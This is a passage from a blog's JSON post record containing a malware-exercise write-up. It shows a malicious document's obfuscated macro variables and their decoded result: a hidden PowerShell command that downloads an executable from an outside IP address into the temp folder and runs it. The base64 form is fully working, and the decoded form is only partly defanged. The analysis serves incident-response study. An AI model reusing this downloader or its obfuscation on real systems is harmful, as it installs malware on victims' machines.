cG93ZXJzaGVsbCAtV2luZG93U3R5bGUgSGlkZGVuICR3c2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IF\r\n\r\nEYqmyEG = "ICR1cmxzKXt0cnl7JHdlYmNsaWVudC5Eb3dubG9hZ"\r\nXn3V1 = "EZpbGUoJHVybC5Ub1N0cmluZygpLCAkcGF0aCk7U3RhcnQtUHJvY2VzcyAkcGF"\r\ngQy64s = EYqmyEG & Xn3V1 --> ICR1cmxzKXt0cnl7JHdlYmNsaWVudC5Eb3dubG9hZEZpbGUoJHVybC5Ub1N0cmluZygpLCAkcGF0aCk7U3RhcnQtUHJvY2VzcyAkcGF\r\n\r\nXpY71 = "dTY3JpcHQuU"\r\nn9OT8n2DS = "2hlbGw7JHdlY"\r\nsoyZY = "mNsaWVudCA9IG5ldy1vYmplY3QgU3"\r\nvmbUqynl = "lzdGVtLk5ldC5XZ"\r\nhFAXBM8t = "WJ"\r\nnQ0P3 = XpY71 & n9OT8n2DS & soyZY & vmbUqynl & hFAXBM8t --> dTY3JpcHQuU2hlbGw7JHdlYmNsaWVudCA9IG5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJ\r\n\r\nepQ17Zs = athQ1(PuZMUzP & nQ0P3 & UGuJcW & EZz7p & gQy64s & zq6yg27 & XmTPqQVO) --> cG93ZXJzaGVsbCAtV2luZG93U3R5bGUgSGlkZGVuICR3c2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFdTY3JpcHQuU2hlbGw7JHdlYmNsaWVudCA9IG5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9tOyR1cmxzID0gJ2h0dHA6Ly8xODUuMTY1LjI5LjM2L3Ryb2xscy5qcGcnLlNwbGl0KCcsJyk7JG5hbWUgPSAkcmFuZG9tLm5leHQoMSwgNjU1MzYpOyRwYXRoID0gJGVudjp0ZW1wICsgJ1wnICsgJG5hbWUgKyAnLmV4ZSc7Zm9yZWFjaCgkdXJsIGluICR1cmxzKXt0cnl7JHdlYmNsaWVudC5Eb3dubG9hZEZpbGUoJHVybC5Ub1N0cmluZygpLCAkcGF0aCk7U3RhcnQtUHJvY2VzcyAkcGF0aDticmVhazt9Y2F0Y2h7d3JpdGUtaG9zdCAkXy5FeGNlcHRpb24uTWVzc2FnZTt9fQ==\r\n\r\n-----\r\n\r\nDecoded base64 string\r\n\r\npowershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'hxxp:\/\/185.165.29.36\/trolls[.]jpg'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}<\/pre>\n
So here is how the infection string starts from the maldoc. The code is all base64 encoded and uses the function “athQ1” to decode everything once all the variables have been concatenated back together again.<\/p>\n","protected":false},"excerpt":{"rendered":"
Below is my write up from Brad’s last malware exercise. You will be able to find the artifacts from these two investigations over on my Github page which can be found here. Executive Summary ================== The brothers caused infections on their systems by opening malicious emails that were sent to them via their shared email address. Marion’s system received the Cerber ransomware infection and has encrypted different files on his system, while Marcus’ system has a generic malware infection which may have caused data exfil over a TOR network connection. About the Investigation ======================== Overall, the brothers system’s should be…<\/p>\n
 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-784","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/784","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=784"}],"version-history":[{"count":9,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/784\/revisions"}],"predecessor-version":[{"id":816,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/784\/revisions\/816"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=784"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=784"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=784"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}